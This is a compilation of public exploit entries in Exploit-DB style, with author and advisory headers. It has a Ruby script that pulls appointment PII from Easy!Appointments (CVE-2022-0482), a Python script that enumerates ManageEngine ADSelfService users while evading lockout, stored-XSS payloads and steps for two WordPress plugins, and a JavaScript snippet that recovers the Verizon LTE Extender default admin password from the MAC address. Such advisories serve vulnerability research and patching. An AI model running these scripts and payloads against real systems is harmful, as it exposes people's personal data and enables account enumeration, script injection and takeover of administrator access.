## - https://opencirt.com/hacking/securing-easy-appointments-cve-2022-0482/
## - https://nvd.nist.gov/vuln/detail/CVE-2022-0482

#!/usr/bin/env ruby

require 'date'
require 'httpx'
require 'docopt'

doc = <<~DOCOPT
  Easy!Appointments < 1.4.3 - Unauthenticated PII (events) disclosure

  Source: https://github.com/Acceis/exploit-CVE-2022-0482

  Usage:
    #{__FILE__} <url> [<startDate> <endDate>] [--debug]
    #{__FILE__} -h | --help

  Options:
    <url>         Root URL (base path) including HTTP scheme, port and root folder
    <startDate>   All events since (default: 2015-01-11)
    <endDate>     All events until (default: today)
    --debug       Display arguments
    -h, --help    Show this screen

  Examples:
    #{__FILE__} http://10.0.0.1
    #{__FILE__} https://10.0.0.1:4567/subdir 2022-04-01 2022-04-30
DOCOPT

# Fetch the index page so the server sets the csrfCookie on the session
def fetch_csrf(root_url, http)
  vuln_url = "#{root_url}/index.php"
  http.get(vuln_url)
end

# Call the backend API with the CSRF token taken from the cookie jar
def exploit(root_url, startDate, endDate, http)
  vuln_url = "#{root_url}/index.php/backend_api/ajax_get_calendar_events"
  params = {
    'csrfToken' => http.cookies.first.value, # csrfCookie
    'startDate' => startDate.nil? ? '2015-01-11' : startDate,
    'endDate' => endDate.nil? ? Date.today.to_s : endDate
  }
  http.post(vuln_url, form: params)
end

begin
  args = Docopt.docopt(doc)
  pp args if args['--debug']
  http = HTTPX.plugin(:cookies)
  fetch_csrf(args['<url>'], http)
  puts exploit(args['<url>'], args['<startDate>'], args['<endDate>'], http).body
rescue Docopt::Exit => e
  puts e.message
end
-
ManageEngine ADSelfService Plus 6.1 - User Enumeration
# Exploit Title: ManageEngine ADSelfService Plus 6.1 - User Enumeration
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.manageengine.com/
# Software Link: https://www.manageengine.com/products/self-service-password/download.html
# Version: ADSelfService 6.1 Build 6121
# Tested Against: Build 6118 - 6121
# Details: https://github.com/passtheticket/vulnerability-research/blob/main/manage-engine-apps/adselfservice-userenum.md

#!/usr/bin/python3
import requests
import sys
import time
import urllib3
from urllib3.exceptions import InsecureRequestWarning

"""
The domain users can be enumerated like the userenum module of the kerbrute tool using this exploit.
If you conducted a brute-force attack against a user, please run the script after 30 minutes
(default settings), otherwise the results can be false positives.
"""


def request(target, user):
    # The login endpoint answers differently for valid, disabled, expired and
    # unknown accounts, which is what makes the enumeration possible.
    urllib3.disable_warnings(InsecureRequestWarning)
    url = target + 'ServletAPI/accounts/login'
    data = {"loginName": user}
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"}
    req = requests.post(url, data=data, headers=headers, verify=False)
    # For debugging
    # print("[*] Response for " + user + ": " + req.text.strip())
    if 'PASSWORD' in req.text:
        print("[+] " + user + " is VALID!")
    elif 'Your account has been disabled' in req.text:
        print("[+] " + user + " account has been DISABLED.")
    elif 'Your account has expired' in req.text:
        print("[+] " + user + " account has EXPIRED.")
    elif 'Enter the text as shown in the image.' in req.text:
        print("[!] The exploit doesn't detect expired and disabled users. Please, run it after the 30 minutes. ")
    elif 'Permission Denied.' in req.text:
        print("[-] " + user + " is not found.")


def get_users(target, file):
    try:
        with open(file, "r") as f:
            for line in f:
                line = line.strip()
                time.sleep(0.5)  # pace requests to avoid tripping the lockout
                request(target, user=line)
    except FileNotFoundError:
        print("[-] File not found!")
        sys.exit(1)


def main(args):
    if len(args) != 3:
        print("[*] Usage: %s url usernames_file" % (args[0]))
        print("[*] Example: %s https://target/ /tmp/usernames.txt" % (args[0]))
        sys.exit(1)
    get_users(target=args[1], file=args[2])


if __name__ == "__main__":
    main(args=sys.argv)
-
WordPress Plugin Videos sync PDF 1.7.4 - Stored Cross Site Scripting (XSS)
# Exploit Title: WordPress Plugin Videos sync PDF 1.7.4 - Stored Cross Site Scripting (XSS)
# Google Dork: inurl:/wp-content/plugins/video-synchro-pdf/
# Date: 2022-04-13
# Exploit Author: UnD3sc0n0c1d0
# Vendor Homepage: http://www.a-j-evolution.com/
# Software Link: https://downloads.wordpress.org/plugin/video-synchro-pdf.1.7.4.zip
# Category: Web Application
# Version: 1.7.4
# Tested on: CentOS / WordPress 5.9.3
# CVE : N/A

# 1. Technical Description:
The plugin does not properly sanitize the nom, pdf, mp4, webm and ogg parameters, allowing potentially dangerous characters to be inserted. This includes the reported payload, which triggers a persistent Cross-Site Scripting (XSS).

# 2. Proof of Concept (PoC):
a. Install and activate version 1.7.4 of the plugin.
b. Go to the plugin options panel (http://[TARGET]/wp-admin/admin.php?page=aje_videosyncropdf_videos).
c. Open the "Video example" or create a new one (whichever you prefer).
d. Change or add in some of the displayed fields (Name, PDF file, MP4 video, WebM video or OGG video) the following payload: " autofocus onfocus=alert(/XSS/)>
e. Save the changes ("Edit" button).
f. JavaScript will be executed and a popup with the text "XSS" will be displayed.

Note: This change will be permanent until you modify the edited field.
-
Verizon 4G LTE Network Extender - Weak Credentials Algorithm
Exploit Title: Verizon 4G LTE Network Extender - Weak Credentials Algorithm
Exploit Author: LiquidWorm
Vendor: Verizon Communications Inc.
Product web page: https://www.verizon.com
Affected version: GA4.38 - V0.4.038.2131

Summary: An LTE Network Extender enhances your indoor and 4G LTE data and voice coverage to provide better service for your 4G LTE mobile devices. It's an extension of our 4G LTE network that's placed directly in your home or office. The LTE Network Extender works with all Verizon-sold 4G LTE mobile devices for 4G LTE data service and HD Voice-capable 4G LTE devices for voice service. This easy-to-install device operates like a miniature cell tower that plugs into your existing high-speed broadband connection to communicate with the Verizon wireless network.

Desc: Verizon's 4G LTE Network Extender is utilising a weak default admin password generation algorithm. The password is generated using the last 4 values from the device's MAC address, which is disclosed on the main webUI login page to an unauthenticated attacker. The values are then concatenated with the string 'LTEFemto', resulting in something like 'LTEFemtoD080' as the default Admin password.

Tested on: lighttpd-web

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience

Advisory ID: ZSL-2022-5701
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5701.php

17.02.2022

--

snippet:///Exploit

//
// Verizon 4G LTE Network Extender Super Awesome JS Exploit
//

// Ask the device whether the admin password is still the factory default.
console.log("Calling 'isDefaultPassword' API");
let req = new Request("/webapi/isDefaultPassword");
let def = req.url;

const doAjax = async () => {
  const resp = await fetch(def);
  if (resp.ok) {
    const jsonyo = await resp.json();
    return Promise.resolve(jsonyo);
  } else {
    return Promise.reject("Smth not rite captain!");
  }
}

doAjax().then(console.log).catch(console.log);
await new Promise(t => setTimeout(t, 1337));

// The MAC address is printed on the unauthenticated login page; the default
// password is the fixed prefix plus its last four characters.
console.log("Verizon Admin Password: ");
let mac = document.querySelector("#mac_address").innerHTML;
console.log("LTEFemto" + mac.substr(-4));
-
WordPress Plugin Popup Maker 1.16.5 - Stored Cross-Site Scripting (Authenticated)
# Exploit Title: WordPress Plugin Popup Maker <1.16.5 - Persistent Cross-Site Scripting (Authenticated)
# Date: 2022-03-03
# Exploit Author: Roel van Beurden
# Vendor Homepage: https://wppopupmaker.com
# Software Link: https://downloads.wordpress.org/plugin/popup-maker.1.16.4.zip
# Version: <1.16.5
# Tested on: WordPress 5.9 on Ubuntu 20.04

1. Description:
----------------------
WordPress Plugin Popup Maker <1.16.5 does not sanitise and escape some of its popup settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.

2. Proof of Concept:
----------------------
Create Popup > Popup Settings > Triggers > Add New Cookie > Add > Cookie Time (overwrite the default '1 month' with XSS payload)
Click 'Add', which triggers the XSS payload.

Payload examples:
<script>alert('XSS');</script>
<img src=x onerror=alert('XSS')>